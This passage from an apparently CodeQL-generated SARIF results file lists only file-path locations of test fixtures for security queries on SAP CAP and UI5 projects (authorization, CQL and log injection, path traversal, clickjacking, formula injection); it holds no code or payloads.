tities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json","uriBaseId":"%SRCROOT%","index":132}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":133}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":134}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":135}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":137}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":138}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/model.cds.json","uriBaseId":"%SRCROOT%","index":140}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json","uriBaseId":"%SRCROOT%","index":141}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/model.cds.json","uriBaseId":"%SRCROOT%","index":148}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package-lock.json","uriBaseId":"%SRCROOT%","index":149}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package.json","uriBaseId":"%SRCROOT%","index":150}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":158}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":161}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":162}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":165}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":168}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":169}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":174}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":175}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":178}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":179}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":180}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/package.json","uriBaseId":"%SRCROOT%","index":181}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/model.cds.json","uriBaseId":"%SRCROOT%","index":182}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":183}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/model.cds.json","uriBaseId":"%SRCROOT%","index":188}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":189}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json","uriBaseId":"%SRCROOT%","index":190}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":195}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/model.cds.json","uriBaseId":"%SRCROOT%","index":196}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":197}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/package.json","uriBaseId":"%SRCROOT%","index":198}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":200}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":201}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":202}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":203}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":205}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":206}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":207}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":208}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":209}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":211}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":212}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":215}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":216}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":218}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":219}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":220}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":221}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":223}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":225}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":227}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":228}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":229}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":231}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":232}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":233}},{"location":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/model.cds.json","uriBaseId":"%SRCROOT%","index":235}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}},{"location":{"uri":"javascript/frameworks/ui5/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":239}},{"location":{"uri":"javascript/frameworks/ui5/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":240}},{"location":{"uri":"javascript/frameworks/ui5/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":241}},{"location":{"uri":"javascript/frameworks/ui5/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":242}},{"location":{"uri":"javascript/frameworks/ui5/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":243}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":245}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.html","uriBaseId":"%SRCROOT%","index":246}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.json","uriBaseId":"%SRCROOT%","index":247}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.xml","uriBaseId":"%SRCROOT%","index":248}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}},{"location":{"uri":"javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":250}},{"location":{"uri":"javascript/frameworks/ui5/test/models/binding_path/binding1.xml","uriBaseId":"%SRCROOT%","index":251}},{"location":{"uri":"javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml","uriBaseId":"%SRCROOT%","index":252}},{"location":{"uri":"javascript/frameworks/ui5/test/models/dynamic_write_to_html_content/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":253}},{"location":{"uri":"javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":254}},{"location":{"uri":"javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":255}},{"location":{"uri":"javascript/frameworks/ui5/test/models/sink/sink1.xml","uriBaseId":"%SRCROOT%","index":256}},{"location":{"uri":"javascript/frameworks/ui5/test/models/source/source1.xml","uriBaseId":"%SRCROOT%","index":257}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":258}},{"location":{"uri":"javascript/frameworks/ui5/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":259}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":260}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":261}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":262}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html","uriBaseId":"%SRCROOT%","index":263}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":264}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":265}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":266}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":267}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":270}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":271}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":272}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":273}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":274}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":275}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":276}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":279}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":281}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":282}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":283}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":284}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":285}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":286}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":287}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":289}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":291}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":292}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":293}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":295}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":296}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":298}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":299}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":300}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":301}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":302}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":303}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":304}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":305}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":306}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":307}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":308}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package-lock.json","uriBaseId":"%SRCROOT%","index":309}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package.json","uriBaseId":"%SRCROOT%","index":310}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/ui5.yaml","uriBaseId":"%SRCROOT%","index":311}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.html","uriBaseId":"%SRCROOT%","index":313}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package-lock.json","uriBaseId":"%SRCROOT%","index":317}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package.json","uriBaseId":"%SRCROOT%","index":318}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flo